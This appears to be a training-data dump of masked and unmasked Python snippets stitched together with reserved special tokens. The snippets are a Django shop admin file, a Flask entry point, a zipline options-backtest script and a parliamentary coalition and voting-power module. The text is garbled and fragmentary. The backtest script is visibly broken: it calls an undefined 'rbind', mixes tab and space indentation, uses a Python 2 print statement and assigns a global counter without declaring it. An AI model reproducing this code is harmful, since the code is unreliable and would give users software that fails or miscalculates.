[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
__version__ = '3.13.7'
|
flexible
|
{
"blob_id": "01852f6dbeb78df3098b14d2f0538ad9193ea511",
"index": 9873,
"step-1": "<mask token>\n",
"step-2": "__version__ = '3.13.7'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
class OrderInfoAdmin(admin.ModelAdmin):
list_display = 'ordernum', 'total', 'state'
search_fields = 'total',
list_filter = 'bpub_date',
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = 'isDelete',
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def make_published(modeladmin, request, queryset):
queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
list_display = 'ordernum', 'total', 'state'
search_fields = 'total',
list_filter = 'bpub_date',
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = 'isDelete',
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def make_published(modeladmin, request, queryset):
queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
list_display = 'ordernum', 'total', 'state'
search_fields = 'total',
list_filter = 'bpub_date',
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = 'isDelete',
admin.site.register(cart)
admin.site.register(address_info, address_infoAdmin)
admin.site.register(OrderInfo, OrderInfoAdmin)
admin.site.register(OrderDetailInfo)
admin.site.register(GoodsInfo)
<|reserved_special_token_1|>
from django.contrib import admin
from models import *
def make_published(modeladmin, request, queryset):
queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
list_display = 'ordernum', 'total', 'state'
search_fields = 'total',
list_filter = 'bpub_date',
actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
exclude = 'isDelete',
admin.site.register(cart)
admin.site.register(address_info, address_infoAdmin)
admin.site.register(OrderInfo, OrderInfoAdmin)
admin.site.register(OrderDetailInfo)
admin.site.register(GoodsInfo)
<|reserved_special_token_1|>
#coding=utf-8
from django.contrib import admin
from models import *
# Extra admin action helper.
def make_published(modeladmin, request, queryset):
    """Admin action: set state=1 (published) on every selected row."""
    queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
    """Admin configuration for OrderInfo."""
    # Columns shown in the changelist.
    list_display = ('ordernum', 'total', 'state')
    # Searchable by order total; filterable by publish date.
    search_fields = ('total', )
    list_filter = ('bpub_date',)
    # Bulk action: mark selected orders as published (state=1).
    actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
    """Admin configuration for address_info; hides the soft-delete flag."""
    exclude = ('isDelete',)
# 2017/1/05: register the shop models with the Django admin site.
admin.site.register(cart)
admin.site.register(address_info,address_infoAdmin)
admin.site.register(OrderInfo,OrderInfoAdmin)
admin.site.register(OrderDetailInfo)
admin.site.register(GoodsInfo)
|
flexible
|
{
"blob_id": "74a0282495bf4bbd34b397e0922074659a66d6ff",
"index": 4809,
"step-1": "<mask token>\n\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = 'ordernum', 'total', 'state'\n search_fields = 'total',\n list_filter = 'bpub_date',\n actions = [make_published]\n\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = 'isDelete',\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef make_published(modeladmin, request, queryset):\n queryset.update(state=1)\n\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = 'ordernum', 'total', 'state'\n search_fields = 'total',\n list_filter = 'bpub_date',\n actions = [make_published]\n\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = 'isDelete',\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef make_published(modeladmin, request, queryset):\n queryset.update(state=1)\n\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = 'ordernum', 'total', 'state'\n search_fields = 'total',\n list_filter = 'bpub_date',\n actions = [make_published]\n\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = 'isDelete',\n\n\nadmin.site.register(cart)\nadmin.site.register(address_info, address_infoAdmin)\nadmin.site.register(OrderInfo, OrderInfoAdmin)\nadmin.site.register(OrderDetailInfo)\nadmin.site.register(GoodsInfo)\n",
"step-4": "from django.contrib import admin\nfrom models import *\n\n\ndef make_published(modeladmin, request, queryset):\n queryset.update(state=1)\n\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = 'ordernum', 'total', 'state'\n search_fields = 'total',\n list_filter = 'bpub_date',\n actions = [make_published]\n\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = 'isDelete',\n\n\nadmin.site.register(cart)\nadmin.site.register(address_info, address_infoAdmin)\nadmin.site.register(OrderInfo, OrderInfoAdmin)\nadmin.site.register(OrderDetailInfo)\nadmin.site.register(GoodsInfo)\n",
"step-5": "#coding=utf-8\nfrom django.contrib import admin\nfrom models import *\n\n#增加额外的方法\ndef make_published(modeladmin, request, queryset):\n queryset.update(state=1)\n\nclass OrderInfoAdmin(admin.ModelAdmin):\n list_display = ('ordernum', 'total', 'state')\n search_fields = ('total', )\n list_filter = ('bpub_date',)\n actions = [make_published]\n\nclass address_infoAdmin(admin.ModelAdmin):\n exclude = ('isDelete',)\n\n\n#2017/1/05注册admin站点\nadmin.site.register(cart)\nadmin.site.register(address_info,address_infoAdmin)\nadmin.site.register(OrderInfo,OrderInfoAdmin)\nadmin.site.register(OrderDetailInfo)\nadmin.site.register(GoodsInfo)\n\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
app.run(debug=app.config['DEBUG'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__author__ = '七月'
app = create_app()
if __name__ == '__main__':
app.run(debug=app.config['DEBUG'])
<|reserved_special_token_1|>
from app import create_app
__author__ = '七月'
# Build the Flask application via the app-factory pattern.
app = create_app()
if __name__ == '__main__':
    # Dev server only; DEBUG is read from the app's loaded configuration.
    app.run(debug=app.config['DEBUG'])
|
flexible
|
{
"blob_id": "9a6d6637cd4ecf2f6e9c8eb8e702be06e83beea4",
"index": 998,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n app.run(debug=app.config['DEBUG'])\n",
"step-3": "<mask token>\n__author__ = '七月'\napp = create_app()\nif __name__ == '__main__':\n app.run(debug=app.config['DEBUG'])\n",
"step-4": "from app import create_app\n__author__ = '七月'\napp = create_app()\nif __name__ == '__main__':\n app.run(debug=app.config['DEBUG'])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from zipline.api import (
# add_history,
history,
order_target_percent,
order,
record,
symbol,
get_datetime,
schedule_function,
)
from zipline.algorithm import TradingAlgorithm
from zipline.utils.factory import load_from_yahoo
import numpy as np
import pandas as pd
from datetime import datetime
cash = 0 # tracks the amount of money in the backtest
def initialize(context):
    """Zipline setup hook: prime per-run state and load the FB options chain.

    target_window and bought_options start empty and are filled by the
    other hooks; context.options must provide at least the 'date',
    'expiration' and 'type' columns read elsewhere in this script.
    """
    context.target_window = dict()
    context.bought_options = dict()
    # context.underlying = pd.read_csv('../data/underlying/FB.csv')
    # context.underlying = pd.to_datetime(context.underlying['Date'])
    context.options = pd.read_csv('../data/cleaned_data/FB.csv')
    # Parse date columns up front so later equality filters against
    # get_datetime() compare datetimes rather than raw strings —
    # presumably the CSV stores ISO-formatted dates; verify.
    context.options['date'] = pd.to_datetime(context.options['date'])
    context.options['expiration'] = pd.to_datetime(context.options['expiration'])
# (7) Trade (MODIFY SO THIS SHOULD ONLY HAPPEN ONCE A DAY)
def handle_data(context, data):
    """Zipline per-bar hook: buy classified call options, settle expiries.

    Side effects: mutates the module-level ``cash`` tracker and
    ``context.bought_options``.
    """
    # FIX: ``cash`` was read and assigned here without a global declaration,
    # which raises UnboundLocalError on first use.
    global cash
    day_option_df = context.options[context.options['date'] == get_datetime()]
    call_options = day_option_df[day_option_df['type'] == 'C']
    ################################## classifier stuff happens somewhere here
    call_options_good = call_options  # pass-through until a classifier exists
    ##################################
    # FIX: the original called the undefined R-style ``rbind``; accumulate
    # bought options in a DataFrame instead. initialize() seeds this slot
    # with a dict, so lazily promote it on first use (keeps this edit
    # self-contained).
    if not isinstance(context.bought_options, pd.DataFrame):
        context.bought_options = pd.DataFrame(columns=context.options.columns)
    # Purchase the options the classifier likes (could weight by confidence).
    for index, row in call_options_good.iterrows():
        context.bought_options = pd.concat(
            [context.bought_options, row.to_frame().T], ignore_index=True)
        cash -= row['price']
    # Exercise options expiring today; worthless when strike >= spot.
    expiring_calls = context.bought_options[context.bought_options['expiration'] == get_datetime()]
    for index, row in expiring_calls.iterrows():
        price = history(symbol(row['ticker']), '1d', 'price').iloc[0, 0]
        cash += 100 * max(price - row['strike'], 0)  # 100 shares per contract
# need to add a way to plot cash data vs datetime
def add_to_window(context, window_size, datapoint, ticker):
    """Append ``datapoint`` to the ticker's rolling window, keeping at most
    ``window_size`` of the newest entries."""
    window = context.target_window[ticker]
    window.append(datapoint)
    if len(window) > window_size:
        window = window[-window_size:]
    context.target_window[ticker] = window
if __name__ == '__main__':
    # Backtest entry point: seed the bankroll, load prices, run the algo.
    cash = 10000  # arbitrary starting amount
    universe = ['FB']  # TODO: widen the trading universe
    data = load_from_yahoo(stocks=universe,
        indexes={}, start=datetime(2016, 4, 3),
        end=datetime.today())
    olmar = TradingAlgorithm(initialize=initialize, handle_data=handle_data, capital_base=10000)
    backtest = olmar.run(data)
    backtest.to_csv('backtest-50-2012.csv')
    # FIX: use the print() function form — the original Python-2 print
    # statement is a SyntaxError under Python 3; this form runs on both.
    print(backtest['algorithm_period_return'][-1])
    import pyfolio as pf
    returns, positions, transactions, gross_lev = pf.utils.extract_rets_pos_txn_from_zipline(backtest)
    pf.create_full_tear_sheet(returns, positions=positions, transactions=transactions,
                              gross_lev=gross_lev, live_start_date='2004-10-22')
|
normal
|
{
"blob_id": "2e8737a48bd04ef5c158afb23dc94476ea790e18",
"index": 2074,
"step-1": "from zipline.api import (\r\n\t# add_history,\r\n\thistory,\r\n\torder_target_percent,\r\n\torder,\r\n\trecord,\r\n\tsymbol,\r\n\tget_datetime,\r\n\tschedule_function,\r\n)\r\nfrom zipline.algorithm import TradingAlgorithm\r\nfrom zipline.utils.factory import load_from_yahoo\r\nimport numpy as np \r\nimport pandas as pd \r\nfrom datetime import datetime \r\n\r\ncash = 0 # tracks the amount of money in the backtest\r\n\r\ndef initialize(context):\r\n\tcontext.target_window = dict()\r\n\tcontext.bought_options = dict()\r\n\r\n\t# context.underlying = pd.read_csv('../data/underlying/FB.csv')\r\n\t# context.underlying = pd.to_datetime(context.underlying['Date'])\r\n\r\n\tcontext.options = pd.read_csv('../data/cleaned_data/FB.csv')\r\n\tcontext.options['date'] = pd.to_datetime(context.options['date'])\r\n\tcontext.options['expiration'] = pd.to_datetime(context.options['expiration'])\r\n\r\n\r\n# (7) Trade (MODIFY SO THIS SHOULD ONLY HAPPEN ONCE A DAY)\r\ndef handle_data(context, data):\r\n\tday_option_df = context.options[context.options['date'] == get_datetime()]\r\n\tcall_options = day_option_df[day_option_df['type'] == 'C']\r\n\r\n\t################################## classifier stuff happens somewhere here\r\n\tcall_options_good = call_options # call_options_good is the classified call_options\r\n\t##################################\r\n\r\n\t# purchase the options that we think will end up in the money (could also modify this to give weight to it)\r\n\tfor index, row in call_options_good.iterrows():\r\n\t\tcontext.bought_options = rbind(context.bought_options, row)\r\n\t\tcash -= row['price']\r\n\r\n\t# exercise expiring options that we've bought (assuming strike price is lower than expiration price)\r\n\texpiring_calls = context.bought_options[context.bought_options['expiration'] == get_datetime()]\r\n\tfor index, row in expiring_calls.iterrows():\r\n\t\tprice = history(symbol(row['ticker']), '1d', 'price').iloc[0,0]\r\n cash += 100*max(price - 
row['strike'], 0) # assuming 100:1 ratio equity:option\r\n\r\n # need to add a way to plot cash data vs datetime\r\n\r\ndef add_to_window(context, window_size, datapoint, ticker):\r\n\ttw = context.target_window[ticker]\r\n\ttw.append(datapoint)\r\n\tcontext.target_window[ticker] = tw[-window_size:] if len(tw) > window_size else tw\r\n\r\nif __name__ == '__main__':\r\n\tcash = 10000 # arbitrary amount\r\n\r\n\r\n\tuniverse = ['FB'] # need to change the universe\r\n\tdata = load_from_yahoo(stocks=universe,\r\n\t\tindexes={}, start=datetime(2016, 4, 3), \r\n\t\tend=datetime.today()) \r\n\t\r\n\r\n\r\n\tolmar = TradingAlgorithm(initialize=initialize, handle_data=handle_data, capital_base=10000) \r\n\tbacktest = olmar.run(data)\r\n\tbacktest.to_csv('backtest-50-2012.csv') \r\n\tprint backtest['algorithm_period_return'][-1]\r\n\r\n\timport pyfolio as pf\r\n\treturns, positions, transactions, gross_lev = pf.utils.extract_rets_pos_txn_from_zipline(backtest)\r\n\tpf.create_full_tear_sheet(returns, positions=positions, transactions=transactions, gross_lev=gross_lev, live_start_date='2004-10-22')\r\n\t",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import collections
import itertools
from . import stats
# Public API of this module.
__all__ = [
    'Party',
    'HoR',
    'Coalition'
]
# Immutable record of one party's election result.
Party = collections.namedtuple('Party', 'name,votes,seats')
class HoR(object):
    """House of Representatives: an ordered collection of Party records."""
    def __init__(self, parties, name='HoR'):
        """Store parties sorted by (seats, votes), largest first, plus a
        name -> Party lookup table."""
        self.name = name
        self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.votes), reverse=True))
        self._party_mapping = {p.name: p for p in self._parties}
    def __getitem__(self, item):
        """Look a party up by its name."""
        return self._party_mapping[item]
    @property
    def parties(self):
        """Parties as a tuple, largest (seats, votes) first."""
        return self._parties
    def seats_list(self):
        """Seat counts, in party order."""
        return [p.seats for p in self._parties]
    def votes_list(self):
        """Vote counts, in party order."""
        return [p.votes for p in self._parties]
    def names_list(self):
        """Party names, in party order."""
        return [p.name for p in self._parties]
    def vote_shares_list(self):
        """Each party's fraction of the total vote, in party order."""
        v = self.votes
        return [vi / v for vi in self.votes_list()]
    def seat_shares_list(self):
        """Each party's fraction of the total seats, in party order."""
        s = self.seats
        return [si / s for si in self.seats_list()]
    @property
    def seats(self):
        """Total seats held by the listed parties."""
        return sum(self.seats_list())
    @property
    def votes(self):
        """Total votes cast for the listed parties."""
        return sum(self.votes_list())
    def top(self, n=1):
        """Coalition of the n largest parties."""
        return Coalition(self, self._parties[:n])
    def as_coalition(self):
        """The whole chamber viewed as a single Coalition."""
        return Coalition(self, self._parties)
    def __contains__(self, item):
        return item in self._parties
    def __iter__(self):
        return iter(self._parties)
    def iter_coalitions(self):
        """Yield every non-empty proper coalition of this chamber's parties."""
        for n in range(1, len(self)):
            for coalition in itertools.combinations(self._parties, n):
                yield Coalition(self, coalition)
    def __len__(self):
        return len(self._parties)
    def __hash__(self):
        # NOTE(review): hash is based on party identity while __eq__ below
        # compares seat totals only, so objects that compare equal may hash
        # differently — confirm instances are not used as dict/set keys in a
        # way that relies on __eq__.
        return hash(self._parties)
    def same_as(self, hor):
        """True when both chambers hold exactly the same party tuple."""
        return self.parties == hor.parties
    # Rich comparisons order chambers/coalitions by total seats only.
    def __eq__(self, other):
        return self.seats == other.seats
    def __gt__(self, other):
        return self.seats > other.seats
    def __ge__(self, other):
        return self.seats >= other.seats
    def __le__(self, other):
        return self.seats <= other.seats
    def __lt__(self, other):
        return self.seats < other.seats
    # Voting-power indices re-exported from the sibling ``stats`` module so
    # they are callable as methods on a chamber/coalition instance.
    haar = stats.haar
    dev = stats.dev
    ens = stats.ens
    env = stats.env
    rrp = stats.rrp
    bantsaf_influence = stats.bantsaf_influence
    shepli_shubic = stats.shepli_shubic
    jonson_general = stats.jonson_general
    jonson_influence = stats.jonson_influence
    digen_pakel_general = stats.digen_pakel_general
    digen_pakel_influence = stats.digen_pakel_influence
    holer_pakel = stats.holer_pakel
    describe = stats.describe
    def map_stat(self, stat):
        """Map party name -> value of *stat* for that party.

        *stat* may be 'seats'/'votes' (attribute lookup), one of the stats
        functions themselves (called as stat(self, party)), or the string
        name of a supported per-party index (dispatched via getattr on
        self); any other string raises ValueError.
        """
        if stat in ('seats', 'votes'):
            return {party.name: getattr(party, stat)
                for party in self._parties}
        elif stat in (
            stats.bantsaf_influence,
            stats.shepli_shubic,
            stats.jonson_general,
            stats.jonson_influence,
            stats.digen_pakel_general,
            stats.digen_pakel_influence,
            stats.holer_pakel,
        ):
            return {party.name: stat(self, party)
                for party in self._parties}
        elif stat not in (
            'bantsaf_influence',
            'shepli_shubic',
            'jonson_general',
            'jonson_influence',
            'digen_pakel_general',
            'digen_pakel_influence',
            'holer_pakel',
        ):
            raise ValueError('Stat {} cannot be computed'.format(stat))
        # Remaining case: stat is a recognized index name — call the
        # correspondingly named method on self for each party.
        return {party.name: getattr(self, stat)(party)
            for party in self._parties}
class Coalition(HoR):
    """A subset of a chamber's parties, tied back to the full HoR."""
    def __init__(self, hor, parties, name='Coalition', *, _opposition=None):
        """Build a coalition of *parties* drawn from chamber *hor*.

        ``_opposition`` is an internal cache slot; callers should not pass it.
        """
        super().__init__(parties, name=name)
        self._hor = hor
        self._opposition = _opposition
    @property
    def opposition(self):
        """The complementary coalition (all chamber parties not in self)."""
        if self._opposition is None:
            others = [p for p in self._hor if p not in self]
            # Cache both directions so opposition.opposition is self.
            self._opposition = Coalition(self._hor, others, _opposition=self)
        return self._opposition
    @property
    def hor(self):
        """The full chamber this coalition was drawn from."""
        return self._hor
    def __add__(self, other):
        """Return a new coalition extended by a Party or a disjoint Coalition.

        Raises ValueError if *other* (or any of its parties) is already a
        member, and TypeError for unsupported operand types.
        """
        if isinstance(other, Party):
            if other in self:
                raise ValueError('{} is already present in HoR'.format(other))
            new = self._parties + (other, )
        elif isinstance(other, Coalition) and other.hor.same_as(self.hor):
            intercept = set(other) & set(self._parties)
            if intercept:
                raise ValueError('{} are already present in HoR'.format(intercept))
            new = self._parties + tuple(other)
        else:
            raise TypeError('Wrong type for {}'.format(other))
        return self.__class__(self.hor, new)
    def __sub__(self, other):
        """Return a new coalition with a Party or Coalition removed.

        Raises ValueError when nothing to remove is present, and TypeError
        for unsupported operand types.
        """
        if isinstance(other, Party):
            if other not in self:
                raise ValueError('{} is not present in HoR'.format(other))
            new = set(self._parties) - {other}
        elif isinstance(other, Coalition) and other.hor.same_as(self.hor):
            intercept = set(other) & set(self._parties)
            if not intercept:
                # FIX: the original formatted ``intercept`` in this message,
                # but on this branch ``intercept`` is always empty — report
                # the offending parties instead.
                raise ValueError('{} are not present in HoR'.format(set(other)))
            # NOTE(review): a partial overlap is accepted and silently
            # removes only the shared parties, whereas __add__ rejects any
            # overlap — confirm this asymmetry is intentional.
            new = set(self._parties) - set(other.parties)
        else:
            raise TypeError('Wrong type for {}'.format(other))
        return self.__class__(self.hor, new)
    def has_key_party(self, party):
        """True if *party* is pivotal: the coalition beats its opposition,
        but would no longer do so after *party* defects to the opposition."""
        if party not in self:
            return False
        else:
            opposition = self.opposition
            return (
                (self > opposition)
                and
                ((self - party) <= (opposition + party))
            )
    def key_parties(self):
        """All pivotal parties of this coalition."""
        return list(filter(self.has_key_party, self.parties))
    def is_minimum_winning(self):
        """True when every member party is pivotal (minimal winning)."""
        return all(map(self.has_key_party, self.parties))
|
normal
|
{
"blob_id": "4c927f14065d0557dbe7b371002e133c351d3478",
"index": 6933,
"step-1": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n <mask token>\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n <mask token>\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Coalition(HoR):\n\n def 
__init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n",
"step-2": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n <mask token>\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask 
token>\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n",
"step-3": "<mask token>\n\n\nclass HoR(object):\n <mask token>\n\n def __init__(self, parties, name='HoR'):\n self.name = name\n self._parties = tuple(sorted(parties, key=lambda p: (p.seats, p.\n votes), reverse=True))\n self._party_mapping = {p.name: p for p in self._parties}\n\n def __getitem__(self, item):\n return self._party_mapping[item]\n\n @property\n def parties(self):\n return self._parties\n\n def seats_list(self):\n return [p.seats for p in self._parties]\n\n def votes_list(self):\n return [p.votes for p in self._parties]\n\n def names_list(self):\n return [p.name for p in self._parties]\n\n def vote_shares_list(self):\n v = self.votes\n return [(vi / v) for vi in self.votes_list()]\n\n def seat_shares_list(self):\n s = self.seats\n return [(si / s) for si in self.seats_list()]\n\n @property\n def seats(self):\n return sum(self.seats_list())\n\n @property\n def votes(self):\n return sum(self.votes_list())\n\n def top(self, n=1):\n return Coalition(self, self._parties[:n])\n\n def as_coalition(self):\n return Coalition(self, self._parties)\n\n def __contains__(self, item):\n return item in self._parties\n\n def __iter__(self):\n return iter(self._parties)\n\n def iter_coalitions(self):\n for n in range(1, len(self)):\n for coalition in itertools.combinations(self._parties, n):\n yield Coalition(self, coalition)\n\n def __len__(self):\n return len(self._parties)\n\n def __hash__(self):\n return hash(self._parties)\n\n def same_as(self, hor):\n return self.parties == hor.parties\n\n def __eq__(self, other):\n return self.seats == other.seats\n\n def __gt__(self, other):\n return self.seats > other.seats\n\n def __ge__(self, other):\n return self.seats >= other.seats\n\n def __le__(self, other):\n return self.seats <= other.seats\n\n def __lt__(self, other):\n return self.seats < other.seats\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n 
<mask token>\n <mask token>\n\n def map_stat(self, stat):\n if stat in ('seats', 'votes'):\n return {party.name: getattr(party, stat) for party in self._parties\n }\n elif stat in (stats.bantsaf_influence, stats.shepli_shubic, stats.\n jonson_general, stats.jonson_influence, stats.\n digen_pakel_general, stats.digen_pakel_influence, stats.holer_pakel\n ):\n return {party.name: stat(self, party) for party in self._parties}\n elif stat not in ('bantsaf_influence', 'shepli_shubic',\n 'jonson_general', 'jonson_influence', 'digen_pakel_general',\n 'digen_pakel_influence', 'holer_pakel'):\n raise ValueError('Stat {} cannot be computed'.format(stat))\n return {party.name: getattr(self, stat)(party) for party in self.\n _parties}\n\n\nclass Coalition(HoR):\n\n def __init__(self, hor, parties, name='Coalition', *, _opposition=None):\n super().__init__(parties, name=name)\n self._hor = hor\n self._opposition = _opposition\n\n @property\n def opposition(self):\n if self._opposition is None:\n others = [p for p in self._hor if p not in self]\n self._opposition = Coalition(self._hor, others, _opposition=self)\n return self._opposition\n\n @property\n def hor(self):\n return self._hor\n\n def __add__(self, other):\n if isinstance(other, Party):\n if other in self:\n raise ValueError('{} is already present in HoR'.format(other))\n new = self._parties + (other,)\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & set(self._parties)\n if intercept:\n raise ValueError('{} are already present in HoR'.format(\n intercept))\n new = self._parties + tuple(other)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def __sub__(self, other):\n if isinstance(other, Party):\n if other not in self:\n raise ValueError('{} is not present in HoR'.format(other))\n new = set(self._parties) - {other}\n elif isinstance(other, Coalition) and other.hor.same_as(self.hor):\n intercept = set(other) & 
set(self._parties)\n if not intercept:\n raise ValueError('{} are not present in HoR'.format(intercept))\n new = set(self._parties) - set(other.parties)\n else:\n raise TypeError('Wrong type for {}'.format(other))\n return self.__class__(self.hor, new)\n\n def has_key_party(self, party):\n if party not in self:\n return False\n else:\n opposition = self.opposition\n return self > opposition and self - party <= opposition + party\n\n def key_parties(self):\n return list(filter(self.has_key_party, self.parties))\n\n def is_minimum_winning(self):\n return all(map(self.has_key_party, self.parties))\n",
